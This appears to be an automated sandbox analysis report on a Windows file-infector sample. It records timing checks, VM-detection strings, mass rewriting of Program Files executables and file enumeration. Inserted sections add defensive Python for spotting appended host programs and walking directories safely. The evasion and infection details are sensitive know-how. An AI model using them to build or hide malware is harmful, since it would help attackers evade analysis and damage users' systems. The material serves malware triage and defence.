          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 00000000023598E4 second address: 00000000023598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 0000000002359B4E second address: 0000000002359B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 0000000000E798E4 second address: 0000000000E798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 0000000000E79B4E second address: 0000000000E79B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00409A80 rdtsc
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Dropped PE file which has not been started: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Dropped PE file which has not been started: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Dropped PE file which has not been started: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Dropped PE file which has not been started: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Dropped PE file which has not been started: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Dropped PE file which has not been started: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Dropped PE file which has not been started: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Dropped PE file which has not been started: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
          Source: C:\Windows\svchost.com | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe TID: 4404 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00405080 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00405634 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00404F6C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040EA04 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040EB16 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 2_2_00405CD8 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 2_2_0040263E FindFirstFileA,
Source: C:\Windows\svchost.com | Code function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Windows\svchost.com | Code function: 5_2_00404F6C FindFirstFileA,FindClose,
Source: C:\Windows\svchost.com | Code function: 5_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Windows\svchost.com | Code function: 5_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Windows\svchost.com | Code function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Windows\svchost.com | Code function: 5_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Windows\svchost.com | Code function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Windows\svchost.com | Code function: 5_2_0040EA04 FindFirstFileA,FindClose,
Source: C:\Windows\svchost.com | Code function: 5_2_0040EB16 FindFirstFileA,FindClose,
Source: C:\Windows\svchost.com | Code function: 5_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,
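Added example (not part of this report and not code from the sample): the rows above show C:\Windows\svchost.com rewriting executables across Program Files while the drive and directory enumeration (GetLogicalDriveStringsA, FindFirstFileA/FindNextFileA) selects targets, and a copy of the original program appearing under %TEMP%\3582-490\. That is how a Neshta-style prepending infector behaves: the infector body is the PE image the loader runs, and the victim program is appended behind it. The end of a PE image is computable from its section table (plus the Authenticode blob, if any), so anything past it is an overlay, and an overlay that itself begins with an MZ header is the indicator to check on the listed files. The PE images used here are constructed minimal fixtures, not files from the report; all function and constant names are the example's own.

```python
"""Find a host program hidden behind a PE image (prepending-infector triage)."""
import struct

SECTION_HEADER_SIZE = 40
PE32_MAGIC = 0x10B


def pe_image_end(data: bytes) -> int:
    """Return the offset at which the PE image (headers, sections, signature) ends."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", data, coff + 2)
    opt_size, = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    sect_table = opt + opt_size
    end = sect_table + num_sections * SECTION_HEADER_SIZE
    for i in range(num_sections):
        # SizeOfRawData and PointerToRawData sit at +16 and +20 of each section entry.
        size_raw, ptr_raw = struct.unpack_from("<II", data, sect_table + i * SECTION_HEADER_SIZE + 16)
        end = max(end, ptr_raw + size_raw)
    # An Authenticode signature (data directory 4, Certificate Table) is also stored
    # past the sections; count it as part of the image so signed files are not flagged.
    magic, = struct.unpack_from("<H", data, opt)
    dir_base = 96 if magic == PE32_MAGIC else 112   # data directories: PE32 vs PE32+
    if opt_size >= dir_base + 40:
        cert_off, cert_size = struct.unpack_from("<II", data, opt + dir_base + 32)
        if cert_off >= end:
            end = max(end, cert_off + cert_size)
    return end


def extract_overlay(data: bytes) -> bytes:
    """Bytes after the PE image; for a prepending infector this is the original host."""
    return data[pe_image_end(data):]


def overlay_report(data: bytes) -> dict:
    """Summarise the overlay; overlay_is_pe is the prepending-infector indicator."""
    end = pe_image_end(data)
    overlay = data[end:]
    return {"image_end": end, "overlay_size": len(overlay), "overlay_is_pe": overlay[:2] == b"MZ"}


def build_minimal_pe(section_data: bytes, cert_blob: bytes = b"") -> bytes:
    """Constructed fixture: a one-section PE32, optionally with a fake signature blob."""
    e_lfanew, opt_size, raw_ptr = 0x40, 0xE0, 0x200
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # COFF header: Machine=i386, 1 section, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 60, e_lfanew + 4 + 20 + opt_size + SECTION_HEADER_SIZE)  # SizeOfHeaders
    image_len = raw_ptr + len(section_data)
    if cert_blob:
        struct.pack_into("<II", opt, 96 + 32, image_len, len(cert_blob))  # Certificate Table entry
    section = struct.pack("<8sIIIIIIHHI", b".text\0\0\0", len(section_data), 0x1000,
                          len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    image = dos + b"PE\0\0" + coff + opt + section
    image += b"\0" * (raw_ptr - len(image))
    return bytes(image + section_data + cert_blob)


if __name__ == "__main__":
    host = build_minimal_pe(b"\xC3" * 16)              # the victim program
    infected = build_minimal_pe(b"\x90" * 64) + host   # infector body with the host appended
    print(overlay_report(host))
    print(overlay_report(infected))
    assert extract_overlay(infected) == host           # the original, as the %TEMP% copy would be
```

Run overlay_report over the paths in the "Dropped PE file" rows. A large overlay that does not start with MZ is usually installer data (NSIS stubs, self-extractors) rather than an infection; an MZ overlay should be compared with the infector body hash, and the overlay recovered with extract_overlay can be hashed against a known-good copy of the program.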
Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File opened: C:\Documents and Settings\All Users\
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File opened: C:\Documents and Settings\All Users\Application Data\
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\11357\
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\
Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File opened: C:\Documents and Settings\All Users\Application Data\Application Data\
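Added example (not part of this report): the "File opened" rows above show the sample re-entering C:\Documents and Settings\All Users\Application Data\Application Data\... On Windows those names are NTFS junctions (Documents and Settings onto Users, All Users onto ProgramData, and ProgramData\Application Data back onto ProgramData), so a FindFirstFile/FindNextFile recursion that follows reparse points loops until the path length limit stops it. A scanner that has to walk the same trees, for example to check the dropped files listed in this report, must refuse to descend into reparse points and must also detect cycles by directory identity, since the same directory can be reached through a second path. The fixture below is constructed; on POSIX a symlink stands in for the junction, and the file names in it are invented.

```python
"""Walk directory trees for executables without following reparse-point loops."""
import os
import stat
import tempfile

EXE_SUFFIXES = (".exe", ".dll", ".sys", ".com", ".scr")
MAX_DEPTH = 64   # hard stop even if identity tracking were somehow defeated


def is_reparse_point(entry: os.DirEntry) -> bool:
    """True for symlinks and, on Windows, for junctions and mount points."""
    if entry.is_symlink():
        return True
    attrs = getattr(entry.stat(follow_symlinks=False), "st_file_attributes", 0)
    return bool(attrs & getattr(stat, "FILE_ATTRIBUTE_REPARSE_POINT", 0))


def walk_executables(root: str):
    """Yield executable file paths under root; every directory is visited at most once."""
    seen = set()
    stack = [(root, 0)]
    while stack:
        directory, depth = stack.pop()
        st = os.stat(directory)
        ident = (st.st_dev, st.st_ino)   # on Windows st_ino is the NTFS file index
        if ident in seen or depth > MAX_DEPTH:
            continue
        seen.add(ident)
        try:
            entries = list(os.scandir(directory))
        except PermissionError:
            continue   # e.g. the ACL on ProgramData\Application Data denies listing
        for entry in entries:
            if is_reparse_point(entry):
                continue   # never descend through junctions or symlinks
            if entry.is_dir(follow_symlinks=False):
                stack.append((entry.path, depth + 1))
            elif entry.is_file(follow_symlinks=False) and entry.name.lower().endswith(EXE_SUFFIXES):
                yield entry.path


def count_executables(root: str) -> int:
    return sum(1 for _ in walk_executables(root))


def build_loop_fixture() -> str:
    """Constructed tree reproducing the report's loop: ProgramData/Application Data -> ProgramData."""
    base = tempfile.mkdtemp(prefix="junction-loop-")
    prog = os.path.join(base, "ProgramData")
    os.makedirs(os.path.join(prog, "Adobe", "ARM"))
    with open(os.path.join(prog, "Adobe", "ARM", "AdobeARM.exe"), "wb") as f:
        f.write(b"MZ")                      # invented file name, stands in for a real executable
    with open(os.path.join(prog, "notes.txt"), "w") as f:
        f.write("not executable\n")
    os.symlink(prog, os.path.join(prog, "Application Data"), target_is_directory=True)
    return base


if __name__ == "__main__":
    root = build_loop_fixture()
    for path in walk_executables(root):
        print(path)
    print("executables:", count_executables(root))   # the walk terminates with one hit
```

The reparse-point test alone is not sufficient on a tree where a directory is mounted or hard-linked twice, which is why the (st_dev, st_ino) set is kept as well; the depth cap is a last line of defence against either check failing.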
Source: explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.360481969.00000000063F6000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000004.00000000.368886619.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
